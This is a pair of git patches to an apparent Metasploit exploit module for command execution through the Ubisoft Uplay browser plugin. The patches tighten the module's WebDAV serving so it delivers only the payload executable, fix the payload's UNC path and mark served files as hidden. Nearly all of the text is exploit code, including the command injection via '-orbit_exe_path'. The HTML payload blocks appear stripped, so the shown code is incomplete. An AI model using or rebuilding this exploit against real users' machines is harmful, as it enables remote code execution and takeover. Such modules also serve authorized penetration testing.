From 833999b2c35381136c1735d43c6379830482277c Mon Sep 17 00:00:00 2001 From: Meatballs1 Date: Sat, 4 Aug 2012 17:59:45 +0100 Subject: [PATCH 1/2] Changed blacklist to 404 all files that are not our share and executable - this allows windows/exec payload to work --- .../windows/browser/ubisoft_uplay_cmd_exec.rb | 43 ++++++++++--------- 1 file changed, 22 insertions(+), 21 deletions(-) diff --git a/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb b/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb index 8c79c514c3..70b298dc40 100644 --- a/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb +++ b/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Exploit::Remote url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/" - path = "#{@exploit_unc}#{@share_name}#{@basename}.exe" + path = "#{@exploit_unc}#{@share_name}\\#{@basename}.exe" if path.length > 693 fail_with(Exploit::Failure::Unknown,"Remote path is too long must be < 694 characters") @@ -118,17 +118,16 @@ class Metasploit3 < Msf::Exploit::Remote classid = "clsid:1c492e6a-2803-5ed7-83e1-1b1d4d41eb39" type = "application/x-uplaypc" # Unused but alternative to classid - content = %Q| - - - - - - | + content = %Q| + + + +| print_status("GET => Exploit") send_response_html(cli, content) @@ -136,7 +135,6 @@ class Metasploit3 < Msf::Exploit::Remote end def process_get(cli, request) - myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] webdav = "\\\\#{myhost}\\" @@ -397,16 +395,19 @@ class Metasploit3 < Msf::Exploit::Remote # This method rejects requests that are known to break exploitation def blacklisted_path?(uri) - return true if uri =~ /\.(config|manifest|Local|dll)/i - return true if uri =~ /desktop\.ini/i - return true if uri =~ /lib.*\.dll/i - return true if uri =~ /\.tmp$/i - return true if uri =~ /(pcap|packet)\.dll/i - false + share_path = "/#{@share_name}" + payload_path = "#{share_path}/#{@basename}.exe" + case uri + when payload_path + return false + when share_path + return false + else + return true + end end def exploit - if datastore['EXPLOITPATH'] @uplay_uri = datastore['EXPLOITPATH'] else @@ -421,7 +422,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Exploit::Failure::Unknown, 'Using WebDAV requires SRVPORT=80 and URIPATH=/') end - vprint_status("Payload available at #{@exploit_unc}#{@share_name}\\#{@basename}") + vprint_status("Payload available at #{@exploit_unc}#{@share_name}\\#{@basename}.exe") print_status("Exploit URI: http://#{myhost}:#{datastore['SRVPORT']}/#{@uplay_uri}") super From 1aacea951db475607db9fc7858d67b4eb6ec1c54 Mon Sep 17 00:00:00 2001 From: Meatballs1 Date: Sat, 4 Aug 2012 18:03:12 +0100 Subject: [PATCH 2/2] Serve files as hidden --- modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb b/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb index 70b298dc40..3a5ac40576 100644 --- a/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb +++ b/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb @@ -377,6 +377,7 @@ x.open('-orbit_product_id 1 -orbit_exe_path #{cmd} -uplay_steam_mode -uplay_dev_ application/octet-stream HTTP/1.1 200 OK +1 |